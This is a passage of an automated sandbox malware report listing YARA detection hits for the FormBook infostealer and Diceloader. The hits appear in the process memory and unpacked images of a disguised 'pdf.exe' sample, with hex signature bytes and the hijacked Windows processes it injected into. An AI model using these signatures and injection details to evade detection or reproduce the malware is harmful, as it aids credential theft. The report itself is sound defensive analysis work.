Process Memory Space: svchost.exe PID: 6272	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x103:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmmon32.exe PID: 5376	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x940dc:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: wmplayer.exe PID: 6672	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x34e83:$a1: 3C 30 50 4F 53 54 74 09 40 0x147f50:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: raserver.exe PID: 1088	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x139a14:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 102 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.csc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.csc.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.csc.exe.400000.0.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1e4b9:$a1: E9 92 9D FF FF C3 E8
6.2.csc.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.csc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.csc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
17.2.calc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.2.calc.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
17.2.calc.exe.400000.0.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1e4b9:$a1: E9 92 9D FF FF C3 E8
17.2.calc.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
17.2.calc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.calc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
17.2.calc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
17.2.calc.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
17.2.calc.exe.400000.0.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
17.2.calc.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
17.2.calc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.calc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
31.2.wmplayer.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
31.2.wmplayer.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
31.2.wmplayer.exe.400000.0.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
31.2.wmplayer.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
31.2.wmplayer.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
31.2.wmplayer.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
20.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
20.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
20.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
20.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
20.2.svchost.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
20.2.svchost.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
6.2.csc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.csc.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.csc.exe.400000.0.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
6.2.csc.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
6.2.csc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.csc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
31.2.wmplayer.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
31.2.wmplayer.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
31.2.wmplayer.exe.400000.0.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1e4b9:$a1: E9 92 9D FF FF C3 E8
31.2.wmplayer.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
31.2.wmplayer.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
31.2.wmplayer.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
20.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
20.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
20.2.svchost.exe.400000.0.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1e4b9:$a1: E9 92 9D FF FF C3 E8
20.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bda0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
20.2.svchost.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
20.2.svchost.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x3da0c1:$a1: E9 92 9D FF FF C3 E8 0x436951:$a1: E9 92 9D FF FF C3 E8 0x5403e9:$a1: E9 92 9D FF FF C3 E8
13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3c1059:$a1: 3C 30 50 4F 53 54 74 09 40 0x41d8e9:$a1: 3C 30 50 4F 53 54 74 09 40 0x527381:$a1: 3C 30 50 4F 53 54 74 09 40 0x3d79a8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x434238:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x53dcd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3c57d7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x422067:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x52baff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3d06bf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x42cf4f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x5369e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x3c4710:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3c498a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x420fa0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x42121a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x52aa38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x52acb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3d04bd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x42cd4d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5367e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3cffa9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x42c839:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x5362d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3d05bf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x42ce4f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5368e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3d0737:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x42cfc7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x536a5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3c53a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x421c32:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x52b6ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3d3621:$sqlite3step: 68 34 1C 7B E1 0x3d3734:$sqlite3step: 68 34 1C 7B E1 0x42feb1:$sqlite3step: 68 34 1C 7B E1 0x42ffc4:$sqlite3step: 68 34 1C 7B E1 0x539949:$sqlite3step: 68 34 1C 7B E1 0x539a5c:$sqlite3step: 68 34 1C 7B E1 0x3d3650:$sqlite3text: 68 38 2A 90 C5 0x3d3775:$sqlite3text: 68 38 2A 90 C5 0x42fee0:$sqlite3text: 68 38 2A 90 C5 0x430005:$sqlite3text: 68 38 2A 90 C5 0x539978:$sqlite3text: 68 38 2A 90 C5 0x539a9d:$sqlite3text: 68 38 2A 90 C5 0x3d3663:$sqlite3blob: 68 53 D8 7F 8C 0x3d378b:$sqlite3blob: 68 53 D8 7F 8C 0x42fef3:$sqlite3blob: 68 53 D8 7F 8C 0x43001b:$sqlite3blob: 68 53 D8 7F 8C 0x53998b:$sqlite3blob: 68 53 D8 7F 8C 0x539ab3:$sqlite3blob: 68 53 D8 7F 8C
0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x3da0c1:$a1: E9 92 9D FF FF C3 E8 0x436951:$a1: E9 92 9D FF FF C3 E8 0x560421:$a1: E9 92 9D FF FF C3 E8
0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3c1059:$a1: 3C 30 50 4F 53 54 74 09 40 0x41d8e9:$a1: 3C 30 50 4F 53 54 74 09 40 0x5473b9:$a1: 3C 30 50 4F 53 54 74 09 40 0x3d79a8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x434238:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x55dd08:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3c57d7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x422067:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x54bb37:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3d06bf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x42cf4f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x556a1f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x3c4710:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3c498a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x420fa0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x42121a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x54aa70:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x54acea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3d04bd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x42cd4d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x55681d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x3cffa9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x42c839:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x556309:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3d05bf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x42ce4f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x55691f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x3d0737:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x42cfc7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x556a97:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3c53a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x421c32:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x54b702:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3d3621:$sqlite3step: 68 34 1C 7B E1 0x3d3734:$sqlite3step: 68 34 1C 7B E1 0x42feb1:$sqlite3step: 68 34 1C 7B E1 0x42ffc4:$sqlite3step: 68 34 1C 7B E1 0x559981:$sqlite3step: 68 34 1C 7B E1 0x559a94:$sqlite3step: 68 34 1C 7B E1 0x3d3650:$sqlite3text: 68 38 2A 90 C5 0x3d3775:$sqlite3text: 68 38 2A 90 C5 0x42fee0:$sqlite3text: 68 38 2A 90 C5 0x430005:$sqlite3text: 68 38 2A 90 C5 0x5599b0:$sqlite3text: 68 38 2A 90 C5 0x559ad5:$sqlite3text: 68 38 2A 90 C5 0x3d3663:$sqlite3blob: 68 53 D8 7F 8C 0x3d378b:$sqlite3blob: 68 53 D8 7F 8C 0x42fef3:$sqlite3blob: 68 53 D8 7F 8C 0x43001b:$sqlite3blob: 68 53 D8 7F 8C 0x5599c3:$sqlite3blob: 68 53 D8 7F 8C 0x559aeb:$sqlite3blob: 68 53 D8 7F 8C
0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x5e6b59:$a1: E9 92 9D FF FF C3 E8 0x6433e9:$a1: E9 92 9D FF FF C3 E8 0x76ceb9:$a1: E9 92 9D FF FF C3 E8
